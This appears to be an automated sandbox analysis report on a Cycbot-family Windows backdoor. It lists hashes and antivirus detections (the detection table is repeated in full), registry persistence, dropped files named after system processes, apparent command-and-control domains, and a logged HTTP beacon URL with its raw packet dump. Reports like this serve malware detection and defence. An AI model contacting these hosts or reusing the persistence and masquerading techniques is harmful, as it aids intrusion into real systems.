Analysis Date2014-07-02 04:18:56
MD549fd0df6a35a44a1dfa25d611a5ac252
SHA123bfc9b4b2d5d5008dc820b6779ca55834e7c120

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386
Section.text md5: 1af74f69d0358b1f54c046d970111d7e sha1: a9bed3c39128cd07231bed618fe1066f18cbf0f2 size: 176640
Section.rdata md5: 60a86e2461dc728ebbb9d6321204c3ac sha1: d5ab74b03871c61e49c019a1ee35dd6e945fdd59 size: 2048
Section.data md5: 2441a8f4fef93eedf8b398dc2aeafe64 sha1: e8144e01e862b8d7627797f52e5307108ca819eb size: 16896
Section.tls md5: c7469c71782551f86c26efa9c07ee837 sha1: 396cf0c0bb8158cc0db8ca1f4fd62ec757aa46b8 size: 512
Timestamp2005-10-31 00:56:15
VersionPrivateBuild: 1532
PEhashad06118c39a923890417ea1671c9398526ad8524
IMPhasheaa39bd264c2a66f24e233881ae98ba8
AV360 SafeGen:Trojan.Heur.KS.1
AVAd-AwareGen:Trojan.Heur.KS.1
AVAlwil (avast)Cybota [Trj]
AVArcabit (arcavir)no_virus
AVAuthentiumW32/Goolbot.E.gen!Eldorado
AVAvira (antivir)TR/Crypt.XPACK.Gen
AVCA (E-Trust Ino)Win32/Diple.A!generic
AVCAT (quickheal)Backdoor.Cycbot.B
AVClamAVWin.Trojan.Agent-25432
AVDr. WebBackDoor.Gbot.18
AVEmsisoftGen:Trojan.Heur.KS.1
AVEset (nod32)Win32/Kryptik.KVW
AVFortinetW32/FraudLoad.MK!tr
AVFrisk (f-prot)W32/Goolbot.E.gen!Eldorado (generic, not disinfectable)
AVF-SecureGen:Trojan.Heur.KS.1
AVGrisoft (avg)Generic_r.FO
AVIkarusTrojan-Spy.Win32.Zbot
AVK7Backdoor ( 003210941 )
AVKasperskyTrojan.Win32.Generic
AVMalwareBytesSpyware.Passwords.XGen
AVMcafeeBackDoor-EXI.gen.i
AVMicrosoft Security EssentialsBackdoor:Win32/Cycbot.G
AVMicroWorld (escan)Gen:Trojan.Heur.KS.1
AVNormanwinpe/Cycbot.BP
AVRisingno_virus
AVSophosMal/FakeAV-IS
AVSymantecBackdoor.Cycbot!gen3
AVTrend MicroBKDR_CYCBOT.SMX
AVVirusBlokAda (vba32)no_virus
AVMicrosoft Security EssentialsBackdoor:Win32/Cycbot.G
AVRisingno_virus
AVMcafeeBackDoor-EXI.gen.i
AVMicroWorld (escan)Gen:Trojan.Heur.KS.1
AVMalwareBytesSpyware.Passwords.XGen
AVAvira (antivir)TR/Crypt.XPACK.Gen
AVNormanwinpe/Cycbot.BP
AVIkarusTrojan-Spy.Win32.Zbot
AVFrisk (f-prot)W32/Goolbot.E.gen!Eldorado (generic, not disinfectable)
AVEmsisoftGen:Trojan.Heur.KS.1
AVAuthentiumW32/Goolbot.E.gen!Eldorado
AVAd-AwareGen:Trojan.Heur.KS.1
AVTrend MicroBKDR_CYCBOT.SMX
AV360 SafeGen:Trojan.Heur.KS.1
AVAlwil (avast)Cybota [Trj]
AVEset (nod32)Win32/Kryptik.KVW
AVVirusBlokAda (vba32)no_virus
AVCAT (quickheal)Backdoor.Cycbot.B
AVGrisoft (avg)Generic_r.FO
AVSymantecBackdoor.Cycbot!gen3
AVArcabit (arcavir)no_virus
AVFortinetW32/FraudLoad.MK!tr
AVClamAVWin.Trojan.Agent-25432
AVK7Backdoor ( 003210941 )
AVDr. WebBackDoor.Gbot.18
AVF-SecureGen:Trojan.Heur.KS.1
AVKasperskyTrojan.Win32.Generic
AVCA (E-Trust Ino)Win32/Diple.A!generic

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
1
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load ➝
C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates FileC:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft
Creates ProcessC:\Documents and Settings\Administrator\Application Data\dwm.exe
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data
Creates Mutex{4D92BB9F-9A66-458f-ACA4-66172A7016D4}
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutex{61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex{EEEB680D-AE62-4375-B93E-E9AE5FF585C1}
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNSstellasystemsonline.com
Winsock DNS127.0.0.1
Winsock DNSzonekg.com
Winsock DNSweb20ikastaroa.wikispaces.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft

Creates ProcessC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data

Creates ProcessC:\Documents and Settings\Administrator\Application Data\dwm.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\dwm.exe

Network Details:

DNSwikispaces.com
Type: A
75.126.104.177
DNSwikispaces.com
Type: A
208.43.192.33
DNSweb20ikastaroa.wikispaces.com
Type: A
DNSzonekg.com
Type: A
DNSstellasystemsonline.com
Type: A
HTTP GEThttp://web20ikastaroa.wikispaces.com/file/view/Observa2.jpg/45498543/Observa2.jpg?v25=13&tq=gJ4WK%2FSUh7TFk0R8oY%2BQtMWTUj26kJH7yZVaK%2B%2FbxWq1SfkIYUBM
User-Agent: mozilla/2.0
Flows TCP192.168.1.1:1031 ➝ 75.126.104.177:80

Raw Pcap
0x00000000 (00000)   47455420 2f66696c 652f7669 65772f4f   GET /file/view/O
0x00000010 (00016)   62736572 7661322e 6a70672f 34353439   bserva2.jpg/4549
0x00000020 (00032)   38353433 2f4f6273 65727661 322e6a70   8543/Observa2.jp
0x00000030 (00048)   673f7632 353d3133 2674713d 674a3457   g?v25=13&tq=gJ4W
0x00000040 (00064)   4b253246 53556837 54466b30 52386f59   K%2FSUh7TFk0R8oY
0x00000050 (00080)   25324251 744d5754 556a3236 6b4a4837   %2BQtMWTUj26kJH7
0x00000060 (00096)   795a5661 4b253242 25324662 78577131   yZVaK%2B%2FbxWq1
0x00000070 (00112)   53666b49 5955424d 20485454 502f312e   SfkIYUBM HTTP/1.
0x00000080 (00128)   300d0a43 6f6e6e65 6374696f 6e3a2063   0..Connection: c
0x00000090 (00144)   6c6f7365 0d0a486f 73743a20 77656232   lose..Host: web2
0x000000a0 (00160)   30696b61 73746172 6f612e77 696b6973   0ikastaroa.wikis
0x000000b0 (00176)   70616365 732e636f 6d0d0a41 63636570   paces.com..Accep
0x000000c0 (00192)   743a202a 2f2a0d0a 55736572 2d416765   t: */*..User-Age
0x000000d0 (00208)   6e743a20 6d6f7a69 6c6c612f 322e300d   nt: mozilla/2.0.
0x000000e0 (00224)   0a0d0a                                ...


Strings